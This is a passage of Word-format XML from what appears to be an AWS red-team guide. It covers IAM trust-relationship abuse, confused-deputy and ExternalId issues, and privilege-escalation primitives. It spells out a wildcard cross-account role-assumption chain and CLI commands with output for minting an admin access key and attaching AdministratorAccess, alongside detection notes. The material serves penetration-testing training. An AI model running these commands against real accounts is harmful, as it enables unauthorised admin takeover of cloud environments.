        <w:t xml:space="preserve"> In itself benign — only EC2 assumes for instance-profile purposes. But if an attacker controls EC2-launch paths (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:RunInstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>), they effectively assume via this door. See the privesc matrix in Chapter 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A4C80"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Attacker AWS Accoun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99999999999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9</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role/build-attacke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name chosen to match patter</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Trust policy allows the IAM use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you control to assume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Assume build-attacker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session principal ARN now matche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StringLike "arn:*:iam::*:role/build-*</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Now call sts:AssumeRol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on victim's role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Victim AWS Accoun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11112222333</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role/ci-release-mg</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trust: StringLike PrincipalAr</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Trust clause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"Principal": {"AWS":"*"}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"Action": "sts:AssumeRole"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"Condition":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"StringLike":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"aws:PrincipalArn"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"arn:aws:iam::*:role/build-*</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Resulting sessio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inside victim accoun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Arn: arn:aws:sts::111122223333</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assumed-role/ci-release-mgr/..</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Has all permissions of ci-release-mg</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typically: iam:PassRole, cloudformation:*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codebuild:*, s3:PutObject on deploy bucke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Operator continues to Ch.8 prives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>c</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iam:PassRole + lambda:CreateFunctio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lambda:UpdateFunctionCode + Invok</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Admin in &lt; 3 API call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Trust-relationship abuse. A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StringLike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> wildcard on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PrincipalArn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> lets an attacker craft a matching role name in any account they control. The resulting session has the full identity-policy of the target role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0E35C4F0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.8  The confused-deputy problem and ExternalId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD0D70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Confused deputy is the classical identity-security problem: a trusted intermediary is tricked into doing something on behalf of an attacker that the intermediary's own permissions allow but the attacker's do not. In AWS, the canonical instance was third-party SaaS vendors with wide cross-account trust: an attacker signs up as a customer of the vendor, references another real customer's account ID in their configuration, and the vendor obligingly assumes a role in the wrong customer's account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D5BE9F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> was introduced as the canonical fix: the customer supplies a secret string to the vendor; the vendor includes it in every AssumeRole call; the trust policy requires it. Prior to March 2022, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> was optional and frequently missing. AWS's March 2022 behavioral change </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> vendors to pass ExternalId when present in the trust; it does not, however, require trust policies to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> the condition. Older cross-account trusts from before 2022 that have never been reviewed are still often missing the ExternalId requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FEB181" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.9  SourceIdentity and the audit-trail angle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EC703C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:SourceIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a newer (2021) feature that lets a role-assumer attach a string identifying "who they really are" in the final CloudTrail record. Defenders use it to preserve accountability across role chains. As an attacker: if SourceIdentity is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the trust policy (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:RoleSessionName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:SourceIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditions) and you cannot supply an acceptable value, you cannot chain through that role. Test with your actual operator identity to see what's enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AADDA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.10  Access Analyzer — defender radar you can read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0C480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AWS's IAM Access Analyzer, when enabled, produces "findings" for resources (roles, S3 buckets, KMS keys, etc.) that are accessible from outside the account or outside the organization. For an attacker with enumeration access to the target account, Access Analyzer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a cheat code: they surface every role whose trust admits an external principal, every bucket with a cross-account share, every KMS key with cross-account decrypt. Running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws accessanalyzer list-findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> against a compromised admin-read role is worth more than hours of manual policy reading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383336F7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD06B16" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Six policy types, evaluated together: SCP, resource, identity, permission boundary, session, VPC endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A8FE2A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Explicit deny always wins. An allow requires all applicable stages to agree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B5C91" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Principal element accepts AWS, Service, Federated, CanonicalUser. Each has attack angles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AC8D8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Conditions turn decorative fast when they use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StringLike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> wildcards, unverified tags, or missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447D9B8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Role trust policies are resource policies in disguise; read them like S3 bucket policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43782AC1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Access Analyzer is the defender's radar and — for an attacker with read access — a map of every crack in the identity plane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740D0FD1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="972951207"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424BFBC"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Privilege Escalation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC5E0D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="833688312"/>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2110C887" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="833688312"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Walk through each of the canonical IAM privilege-escalation primitives, their prerequisites, the exact API sequence, detection opportunities, and the CloudGoat / IAM Vulnerable scenario that demonstrates each. End with the privilege-escalation matrix that you will reach for in every engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE9B88A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>If there is a single reason AWS red-teamers still have jobs in 2026, it is this: IAM is hard to write, the cost of a single mis-scoped action is admin, and the attack primitives are well-known but defender coverage is still spotty. Rhino Security Labs's original "AWS IAM Privilege Escalation" research from 2018 catalogued 21 primitives; the community has since pushed the count past thirty. What follows is the 2026 operator's complete list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70594EC6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1  Primitive 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on another user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FF2D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simplest primitive. If your principal has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a resource pattern that matches an admin user, you can mint a new access key for that admin and start using it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382CE96"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create-access-key --user-name admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C0CB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56C163A2"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"AccessKey": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541827E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"UserName": "admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE970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"AccessKeyId": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AKIAEXAMPLECREATEADMIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B52C3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"Status": "Active",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686EA5D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"SecretAccessKey": "wJalrEXAMPLE...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD94E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"CreateDate": "2026-04-20T14:12:00Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA653A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29E44A0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35F9650F"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sts get-caller-identity --access-key-id AKIAEXAMPLECREATEADMIN --secret-access-key ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6BAD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065B2533"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"Arn": "arn:aws:iam::444455556666:user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AECD7F"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5A0E754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Detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> CloudTrail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>userName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">that is not the caller's own is the canonical detection; GuardDuty flags it as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAMUser/CredentialExfiltration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> when followed by anomalous source-IP activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5ED3F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2  Primitive 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:AttachUserPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AttachRolePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AttachGroupPolicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195B7C8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your principal can attach managed policies to itself or to another principal, attach </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:iam::aws:policy/AdministratorAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you are done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C51D95"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attach-user-policy --user-name ci-deploy-bot --policy-arn arn:aws:iam::aws:policy/AdministratorAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560CD576" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># no response body on success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45660521"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list-attached-user-policies --user-name ci-deploy-bot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DFA71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201A10F9"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"AttachedPolicies": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309DE6D"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{"PolicyName": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AdministratorAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>", "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"},</w:t>
      </w:r>
    </w:p>
